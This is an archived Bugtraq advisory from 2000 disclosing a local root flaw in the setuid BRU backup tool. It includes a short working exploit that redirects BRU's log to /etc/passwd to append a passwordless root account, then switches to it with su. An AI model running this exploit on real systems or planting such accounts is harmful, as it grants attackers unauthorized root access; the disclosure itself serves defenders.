[15230] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

BRU Vulnerability

daemon@ATHENA.MIT.EDU (root)
Tue Jun 6 18:28:38 2000

Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------4A45ED3ABE8DAC5121B79B82"
Message-Id:  <393D6B8F.B2099152@gte.net>
Date:         Tue, 6 Jun 2000 14:22:24 -0700
Reply-To: root <comsec.admin@GTE.NET>
From: root <comsec.admin@GTE.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

This is a multi-part message in MIME format.
--------------4A45ED3ABE8DAC5121B79B82
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

We have found a vulnerability in BRU during our 'Security Contest' for
our company.

The details are included.


--

Riley Hassell
Network Security
Speakeasy Networks

1-206-728-9770 ext151

1-206-917-5151 Direct Line



--------------4A45ED3ABE8DAC5121B79B82
Content-Type: text/plain; charset=us-ascii;
 name="adv.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="adv.txt"






BRU backup software Vulnerability:

	Description:
		You can change the log file BRU uses by changing the
		BRUEXECLOG environment variable. Since bru is setuid
                root you can append to any file on the system.

	Exploitation:

		$ BRUEXECLOG=/etc/passwd
		$ export BRUEXECLOG
		$ bru -V '
		> comsec::0:0::/:/bin/sh
		> '
		$ su comsec
		#


	Temporary fix:
		Why do normal users need to run bru. ;)





--------------4A45ED3ABE8DAC5121B79B82--


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[15230] in bugtraq

BRU Vulnerability

daemon@ATHENA.MIT.EDU (root)Tue Jun 6 18:28:38 2000

daemon@ATHENA.MIT.EDU (root)
Tue Jun 6 18:28:38 2000